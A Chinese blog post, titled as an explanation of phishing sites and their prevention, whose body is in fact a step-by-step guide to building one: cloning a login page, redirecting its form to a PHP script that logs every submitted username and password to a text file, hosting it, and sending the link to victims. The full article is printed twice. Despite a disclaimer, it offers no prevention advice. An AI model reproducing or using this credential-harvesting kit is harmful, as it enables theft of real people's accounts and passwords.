常见钓鱼网站原理及预防方法

钓鱼网站介绍:钓鱼网站 - 百度百科

 

反钓鱼:中国反钓鱼联盟

 

注:我写这篇文章不是为了教大家如何制作钓鱼网站,而是让大家了解钓鱼网站的原理,从而避免自己成为下一个受害者。

 

据腾讯安全-网址安全中心数据显示,每月新增恶意网址60,000,000+

 

接下来我将深度剖析钓鱼网站的制作原理。

 

第一步:选择一个网站

首先,必须选择目标网站。它可能是淘宝,百度,腾讯,支付宝等,为了给大家演示,我将使用简书作为目标站点来演示。

 

 

 

第二步:提取源代码

您选择了目标网站,现在必须获取登录页面的源代码,这很简单。只需右键单击页面上的任意位置,然后单击查看网页源代码

然后只需复制所有内容(Ctrl + ACtrl + C)并将其粘贴到记事本中,并将其另存为login.htm

 

 

 

第三步:修改源代码

这是最难的部分,必须在刚刚创建的记事本中找到并修改一些东西。

 

右键检查,找到form表单

 

 

login.html中可以使用Ctrl + F来查找内容。搜索

action="/sessions"

修改为如下图所示:

第四步:创建数据接收脚本

也许你想知道为什么我们把post.php放在那里的代码中?当有人实际点击提交按钮时,网站将执行我们的post.php脚本,但是我们还没有post.php,所以我们必须创建一个。只需打开另一个记事本,然后粘贴此脚本即可:

 

  1. <?php
  2. header ('Location:-The site you are using- ');
  3. $handle = fopen('usernames.txt', 'a');
  4. foreach($_POST as $variable => $value) {
  5. fwrite($handle, $variable);
  6. fwrite($handle, '=');
  7. fwrite($handle, $value);
  8. fwrite($handle, 'rn');
  9. }
  10. fwrite($handle, 'rn');
  11. fclose($handle);
  12. exit;
  13. ?>
 

将文件保存为post.php

 

 

 

第五步:将文件上传到主机

现在您已经创建了2个文件:一个静态文件和一个脚本。(注:可以使用浏览器打开login.html,确保一切正常。)

 

现在只需将它们上传到webhost,其他人就可以访问了。

 

可以找个免费主机,这里暂时不推荐,如有需要请在留言区告我。

(注:国内空间大多需要备案,域名使用自带二级域名,可能些IDC查的比较严,请谨慎使用)

创建一个帐户,然后创建一个网站。按照他们的步骤,很简单的。

上传文件(login.htmlpost.php

可以输入任何账号密码进行测试并尝试登录。

将在public_html中创建一个名为usernames.txt的新文件。

 

 

 

 

第六步:分享URL并收集结果

现在只需将链接发送给某人并等待他们登录。

 

受害者登录页面后,只需打开文件usernames.txt,在第一行的开头,可以看到账号密码。

 

 

 (注:本教程仅用于测试及了解盗号网站原理以便更好防御,请勿用于非法用途)

 

 

温馨提示:避免个人信息泄露,保护个人信息安全,谢谢。

 

 

本博客所有文章如无特别注明均为原创。作者:一土博客复制或转载请以超链接形式注明转自 一土博客
原文地址《常见钓鱼网站原理及预防方法
扫码手机阅读常见钓鱼网站原理及预防方法
钓鱼网站介绍:钓鱼网站 - 百度百科

 

反钓鱼:中国反钓鱼联盟

 

注:我写这篇文章不是为了教大家如何制作钓鱼网站,而是让大家了解钓鱼网站的原理,从而避免自己成为下一个受害者。

 

据腾讯安全-网址安全中心数据显示,每月新增恶意网址60,000,000+

 

接下来我将深度剖析钓鱼网站的制作原理。

 

第一步:选择一个网站

首先,必须选择目标网站。它可能是淘宝,百度,腾讯,支付宝等,为了给大家演示,我将使用简书作为目标站点来演示。

 

 

 

第二步:提取源代码

您选择了目标网站,现在必须获取登录页面的源代码,这很简单。只需右键单击页面上的任意位置,然后单击查看网页源代码

然后只需复制所有内容(Ctrl + ACtrl + C)并将其粘贴到记事本中,并将其另存为login.htm

 

 

 

第三步:修改源代码

这是最难的部分,必须在刚刚创建的记事本中找到并修改一些东西。

 

右键检查,找到form表单

 

 

login.html中可以使用Ctrl + F来查找内容。搜索

action="/sessions"

修改为如下图所示:

第四步:创建数据接收脚本

也许你想知道为什么我们把post.php放在那里的代码中?当有人实际点击提交按钮时,网站将执行我们的post.php脚本,但是我们还没有post.php,所以我们必须创建一个。只需打开另一个记事本,然后粘贴此脚本即可:

 

  1. <?php
  2. header ('Location:-The site you are using- ');
  3. $handle = fopen('usernames.txt', 'a');
  4. foreach($_POST as $variable => $value) {
  5. fwrite($handle, $variable);
  6. fwrite($handle, '=');
  7. fwrite($handle, $value);
  8. fwrite($handle, 'rn');
  9. }
  10. fwrite($handle, 'rn');
  11. fclose($handle);
  12. exit;
  13. ?>
 

将文件保存为post.php

 

 

 

第五步:将文件上传到主机

现在您已经创建了2个文件:一个静态文件和一个脚本。(注:可以使用浏览器打开login.html,确保一切正常。)

 

现在只需将它们上传到webhost,其他人就可以访问了。

 

可以找个免费主机,这里暂时不推荐,如有需要请在留言区告我。

(注:国内空间大多需要备案,域名使用自带二级域名,可能些IDC查的比较严,请谨慎使用)

创建一个帐户,然后创建一个网站。按照他们的步骤,很简单的。

上传文件(login.htmlpost.php

可以输入任何账号密码进行测试并尝试登录。

将在public_html中创建一个名为usernames.txt的新文件。

 

 

 

 

第六步:分享URL并收集结果

现在只需将链接发送给某人并等待他们登录。

 

受害者登录页面后,只需打开文件usernames.txt,在第一行的开头,可以看到账号密码。

 

 

 (注:本教程仅用于测试及了解盗号网站原理以便更好防御,请勿用于非法用途)

 

 

温馨提示:避免个人信息泄露,保护个人信息安全,谢谢。

 

 

相关推荐

分享

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)